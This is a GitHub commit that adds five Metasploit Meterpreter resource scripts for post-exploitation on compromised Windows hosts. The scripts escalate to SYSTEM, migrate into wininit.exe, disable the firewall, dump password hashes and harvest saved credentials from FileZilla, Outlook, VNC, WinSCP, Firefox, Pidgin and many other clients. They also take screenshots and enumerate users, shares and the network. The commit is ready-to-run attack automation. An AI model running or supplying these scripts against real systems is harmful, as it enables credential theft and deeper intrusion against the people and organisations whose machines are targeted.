Added post exploitation

This commit is contained in:
Edo -maland- 2016-09-01 11:26:39 +07:00 committed by GitHub
parent 174efe1cc5
commit 84e3080bc7
5 changed files with 58 additions and 0 deletions

View File

@ -0,0 +1,3 @@
run post/windows/manage/migrate
run post/windows/manage/killfw

29
postexploit/cred_dump.rc Normal file
View File

@ -0,0 +1,29 @@
getsystem
sysinfo
show_mount
screenshot -v -p dump.jpeg -v true
run post/windows/gather/enum_logged_on_users
run post/windows/gather/hashdump
run post/windows/gather/credential_collector
run post/windows/gather/credentials/wsftp_client
run post/windows/gather/credentials/winscp
run post/windows/gather/credentials/windows_autologin
run post/windows/gather/credentials/vnc
run post/windows/gather/credentials/trillian
run post/windows/gather/credentials/total_commander
run post/windows/gather/credentials/smartftp
run post/windows/gather/credentials/outlook
run post/windows/gather/credentials/nimbuzz
run post/windows/gather/credentials/mremote
run post/windows/gather/credentials/imail
run post/windows/gather/credentials/idm
run post/windows/gather/credentials/flashfxp
run post/windows/gather/credentials/filezilla_server
run post/windows/gather/credentials/meebo
run post/windows/gather/credentials/coreftp
run post/windows/gather/credentials/imvu
run post/windows/gather/credentials/epo_sql
run post/windows/gather/enum_ie
run post/multi/gather/pidgin_cred
run post/multi/gather/firefox_creds
run post/multi/gather/filezilla_client_cred

View File

@ -0,0 +1,4 @@
getsystem
run migrate -n wininit.exe
sysinfo
getuid

18
postexploit/gather.rc Normal file
View File

@ -0,0 +1,18 @@
getsystem
sysinfo
screenshot -v -p gather.jpeg -v true
run post/multi/gather/env
enumdesktops
run post/windows/gather/enum_logged_on_users
run post/windows/gather/enum_shares
show_mount
run post/multi/escalate/cups_root_file_read
run post/windows/gather/dumplinks
run post/windows/gather/enum_snmp
run post/windows/gather/arp_scanner
netstat
arp
run post/windows/gather/usb_history
run post/multi/gather/firefox_creds
run post/windows/gather/credential_collector
run post/windows/gather/enum_applications

4
postexploit/sysinfo.rc Normal file
View File

@ -0,0 +1,4 @@
sysinfo
arp
getuid
pwd